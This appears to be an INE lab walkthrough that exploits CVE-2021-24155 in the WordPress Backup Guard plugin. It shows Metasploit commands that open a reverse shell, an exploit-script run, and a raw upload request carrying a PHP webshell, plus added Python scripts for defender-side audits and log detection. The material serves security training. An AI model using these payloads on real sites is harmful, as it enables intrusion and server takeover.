    26 September 22

    Lab Walkthrough - WordPress Plugin Backup Guard RCE

    Posted by INE

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    This exercise shows how to exploit the WordPress plugin Backup Guard v1.5.8 (CVE-2021-24155) to gain a shell on the target machine.

    Purpose: We will learn how to exploit the WordPress plugin Backup Guard using the Metasploit Framework module. We will also see how to exploit it with a Python script, and finally how to exploit it manually to better understand the vulnerability.

    Goal after completing this scenario: Access the /flag.txt file and read the flag!

    Technical difficulty: Beginner

    Introduction

    In 2021, a critical vulnerability was found in the WordPress Plugin Backup Guard. The plugin before v1.6.0 did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.

    This vulnerability has been assigned the CVE id CVE-2021-24155. The CVSS score for this vulnerability is 7.2 High.

    Source: https://nvd.nist.gov/vuln/detail/CVE-2021-24155

    What is WordPress Plugin Backup Guard?

    WordPress Backup and Migrate Plugin – Backup Guard lets you easily back up, restore and migrate a WordPress website. Using this plugin, one can back up and restore the WordPress files, the database, or both.

    Source: https://wordpress.org/plugins/backup/

    Lab Link

    https://my.ine.com/INE/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/4d3b9c33-5751-4aac-a0de-60894a0f8e5a


    Lab Environment

    In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable version of WordPress Plugin Backup Guard is running on the target machine. It can be accessed using the tools installed on Kali at http://demo.ine.local.

    The following credentials might be helpful:

    • Username: admin

    • Password: pass456

    Objective: Exploit the remote code execution (RCE) vulnerability in WordPress Plugin Backup Guard v1.5.8 to gain shell access on the target server and retrieve the flag!

    backup_guard_0.png

    Tools

    The best tools for this lab are:

    • Nmap

    • Dirb

    • Curl

    • A web browser

    • Python

    • Metasploit Framework

    Solution

    Step 1: Open the lab link to access the Kali GUI instance.

    backup_guard_1.png


    Step 2: Check if the provided machine/domain is reachable.

    Command: ping -c3 demo.ine.local

    backup_guard_2.png

    The provided machine is reachable. 192.205.133.3 is the IP address of the target machine.

     Step 3: Check open ports on the provided machine.

     Command: nmap -sS -sV demo.ine.local

    backup_guard_3.png

    Apache httpd 2.4.29 is running on port 80 on the target machine.

    Step 4: Next, we will use the dirb tool to find files and directories on the web server.

     Command: dirb http://demo.ine.local

    backup_guard_4.png

    Step 5: We can notice that WordPress is running on the target machine. We will run the dirb tool again to find installed plugins on the target machine.

     Command: dirb http://demo.ine.local/wp-content/plugins /usr/share/nmap/nselib/data/wp-plugins.lst

    backup_guard_5.png

    Step 6: We can notice that the backup plugin is installed on the target machine. WordPress plugins ship a "README.txt" or "readme.txt" file, from which we can find out the plugin version. We can use the curl command here to view the content of the "README.txt" file.

     Command: curl http://demo.ine.local/wp-content/plugins/backup/README.txt

    backup_guard_6.png

    The Stable tag shows 1.5.8, which is a vulnerable version.
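    As an added defender-side check (this is not part of the INE lab or the plugin's code), the following script parses the Stable tag the way Step 6 does and compares it with the 1.6.0 fix version, then audits the backup-guard upload directory for anything that is not a .sgbp file, which is what the patched plugin enforces. The SGBP magic bytes are not described on this page, so the content check only looks for a PHP open tag; the paths passed to audit_site are assumptions.

```python
import re
from pathlib import Path

# Backup Guard 1.6.0 added the SGBP format/extension check (per the advisory cited above).
FIXED_VERSION = (1, 6, 0)

def parse_stable_tag(readme_text):
    """Pull the version out of a plugin README, e.g. 'Stable tag: 1.5.8'."""
    m = re.search(r"^Stable tag:\s*(\d+(?:\.\d+)*)", readme_text, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None

def is_vulnerable(version):
    """True for any release below the 1.6.0 fix."""
    return tuple(int(p) for p in version.split(".")) < FIXED_VERSION

def audit_backup_entries(entries):
    """entries: iterable of (filename, leading bytes). Flags files in the backup-guard
    upload directory that are not .sgbp backups, and files that carry a PHP open tag."""
    findings = []
    for name, head in entries:
        if not name.lower().endswith(".sgbp"):
            findings.append((name, "unexpected extension"))
        if b"<?php" in head:
            findings.append((name, "PHP open tag in backup directory"))
    return findings

def audit_site(readme_path, backup_dir):
    """Run both checks against a real install (both paths are assumptions)."""
    version = parse_stable_tag(Path(readme_path).read_text(errors="replace"))
    entries = [(p.name, p.read_bytes()[:256]) for p in Path(backup_dir).iterdir() if p.is_file()]
    return {
        "version": version,
        "vulnerable": is_vulnerable(version) if version else None,
        "findings": audit_backup_entries(entries),
    }

if __name__ == "__main__":
    # Constructed sample data: one legitimate backup name and one stray PHP file.
    readme = "=== Backup Guard ===\nRequires at least: 4.7\nStable tag: 1.5.8\n"
    sample = [("site_2022-09-26.sgbp", b"\x00\x01constructed"), ("backdoor.php", b"<?php echo 1;")]
    version = parse_stable_tag(readme)
    print("version:", version, "vulnerable:", is_vulnerable(version))
    for finding in audit_backup_entries(sample):
        print("finding:", finding)
```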

    Exploit using Metasploit module

    Step 7: First check the attacker machine’s IP address.

    Command: ifconfig

    backup_guard_7.jpg

    192.205.133.2 is the attacker machine's IP address.

     Step 8: Start the msfconsole and do a search for the module for CVE-2021-24155.

    Commands:

    msfconsole -q

    search CVE-2021-24155

    backup_guard_8.png

    Step 9: We will use the above-listed module. The credentials to use are:

    • Username: admin

    • Password: pass456

    Run the following commands one by one:

    Commands:

    use exploit/multi/http/wp_plugin_backup_guard_rce

    set username admin

    set password pass456

    set RHOSTS 192.205.133.3

    set LHOST 192.205.133.2

    check

    exploit

    Note: RHOSTS is the target machine's IP address and LHOST is the attacker machine's IP address; these values may differ in your environment.

    backup_guard_9.png

    We have successfully gained a Meterpreter session.

    Step 10: Let's retrieve the flag. Run the following command in the Meterpreter session to drop into a system shell.

    Command: shell

    backup_guard_10.png

     Step 11: Read the flag.

    Commands:

    ls /

    cat /flag.txt

    backup_guard_11.png

    FLAG: 7c5b7206468fd8cfdb779af6a037b6d7

    Exploit using python script

    Step 12: You can search for 'WordPress Plugin Backup Guard 1.5.8 exploit db' on Google to reach the page shown below, or use the direct link given below to go to the corresponding Exploit-DB page. It contains the Python 3 script that we will use to exploit the vulnerability.

    Direct link: https://www.exploit-db.com/exploits/50093

    backup_guard_12.png


    Step 13: From the terminal, save the code in a file named exploit.py. The credentials to use are:

    • Username: admin

    • Password: pass456

    Now, run the script along with the required arguments as:

    Command: python3 exploit.py -T demo.ine.local -P 80 -U / -u admin -p pass456

    backup_guard_13.png


    Step 14: Open the webshell that you uploaded. Retrieve the flag by running the following commands:

    Commands:

    ls /

    cat /flag.txt

    backup_guard_14.png

    FLAG: 7c5b7206468fd8cfdb779af6a037b6d7

    Exploit manually

    Step 15: Navigate to the following URL and log in to the WordPress application using the following credentials:

    URL: http://demo.ine.local/wp-admin

    • Username: admin

    • Password: pass456

    backup_guard_15.png


    Step 16: Configure the browser's proxy settings for interception as shown below.

    backup_guard_16.png


    Step 17: Start Burp Suite and refresh the current page to capture the request. Next, send the captured request to Repeater. You can then turn off the intercept.

    backup_guard_17.png


    Step 18: We will use the below endpoint to push a PHP backdoor in the uploads/backup-guard directory. Note that the token value might vary for you.

    Affected endpoint:

    URL: http://demo.ine.local/wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=107666bca9

    To fetch the token, go to the Backups page of the plugin, right-click on the page and click on View Page Source. You can locate the token here as shown.

    backup_guard_18.png

    backup_guard_18_1.png

    Replace the request in Repeater with the following, substituting your own cookie and token values, and then hit Send.

    Request:

    POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=107666bca9 HTTP/1.1
    Host: demo.ine.local
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept-Encoding: gzip, deflate
    Accept: application/json, text/javascript, */*; q=0.01
    Connection: close
    Accept-Language: de,en-US;q=0.7,en;q=0.3
    Referer: http://demo.ine.local:80/wp-admin/admin.php?page=backup_guard_backups
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------17366980624047956771255332862
    Origin: http://demo.ine.local
    Cookie: wordpress_c8b0349e5f5110aef36750b958f306dc=admin%7C1662196369%7CIj2UHCVsW6yyaOjmNwgpXqv17odxNCxP35L5v3llm88%7C73287e4c35f6bf383229fde7ca7be638ad27bccfa4b53052e7b0e16a9a6f1090; wp-settings-time-1=1662023569; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_c8b0349e5f5110aef36750b958f306dc=admin%7C1662196369%7CIj2UHCVsW6yyaOjmNwgpXqv17odxNCxP35L5v3llm88%7Cf579c17207683667e466a17461bf2ce0191d11fa0111c38a052802f8903f311b
    Content-Length: 337

    -----------------------------17366980624047956771255332862
    Content-Disposition: form-data; name="files[]"; filename="backdoor.php"
    Content-Type: image/png

    <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
    -----------------------------17366980624047956771255332862--

    backup_guard_18_2.png

    A new file has been created in the uploads/backup-guard/ folder.
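    From the defender's side, the two requests in Steps 18 and 19 leave a recognisable trace in the web server access log: a POST to admin-ajax.php with the backup_guard_importBackup action, followed by a request for a .php file under wp-content/uploads/backup-guard/. The detection below is an added example, not part of the INE lab; the log lines are constructed samples in Apache combined format using RFC 5737 addresses and a placeholder token.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs, unquote

# Apache combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

IMPORT_ACTION = "backup_guard_importbackup"       # the admin-ajax action used in Step 18
UPLOAD_DIR = "/wp-content/uploads/backup-guard/"  # where imported files land

def classify(line):
    """Label one access-log line: 'import', 'php_in_backup_dir', or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["path"])
    path = unquote(url.path).lower()
    actions = [a.lower() for a in parse_qs(url.query).get("action", [])]
    if m["method"] == "POST" and path.endswith("/wp-admin/admin-ajax.php") and IMPORT_ACTION in actions:
        return "import"
    if path.startswith(UPLOAD_DIR) and path.endswith(".php"):
        return "php_in_backup_dir"
    return None

def detect(lines):
    """Per client IP, report any .php request inside the backup directory; if the same
    client sent an import POST earlier, report the full chain seen in this lab."""
    seen = defaultdict(list)
    for line in lines:
        kind = classify(line)
        if kind:
            seen[line.split(" ", 1)[0]].append(kind)
    alerts = []
    for ip, kinds in seen.items():
        if "php_in_backup_dir" in kinds:
            chained = "import" in kinds[: kinds.index("php_in_backup_dir")]
            alerts.append((ip, "import followed by PHP execution" if chained else "PHP file served from backup dir"))
    return alerts

# Constructed sample lines (RFC 5737 addresses), modelled on the requests in Steps 18 and 19.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Sep/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1" 200 8123',
    '203.0.113.5 - - [26/Sep/2022:10:00:09 +0000] "POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=PLACEHOLDER HTTP/1.1" 200 57',
    '203.0.113.5 - - [26/Sep/2022:10:00:15 +0000] "GET /wp-content/uploads/backup-guard/backdoor.php?cmd=ls HTTP/1.1" 200 311',
    '198.51.100.7 - - [26/Sep/2022:10:01:00 +0000] "GET /wp-content/uploads/backup-guard/site.sgbp HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

    A legitimate admin restore also produces an 'import' event, so the function alerts only on the .php request and raises the severity when an import from the same client preceded it.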

    Step 19: Access the backdoor and run the command ls /.

    URL: http://demo.ine.local/wp-content/uploads/backup-guard/backdoor.php?cmd=ls /

    backup_guard_19.png

    The flag is there. Retrieve the flag with the cat /flag.txt command.

    backup_guard_19_1.png

    FLAG: 7c5b7206468fd8cfdb779af6a037b6d7

    Conclusion

    In this lab we exploited the remote code execution vulnerability in WordPress plugin Backup Guard 1.5.8 using the Metasploit module, using a Python script, and manually. The vulnerability existed because the plugin did not ensure that imported files are of the SGBP format and extension.


    Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.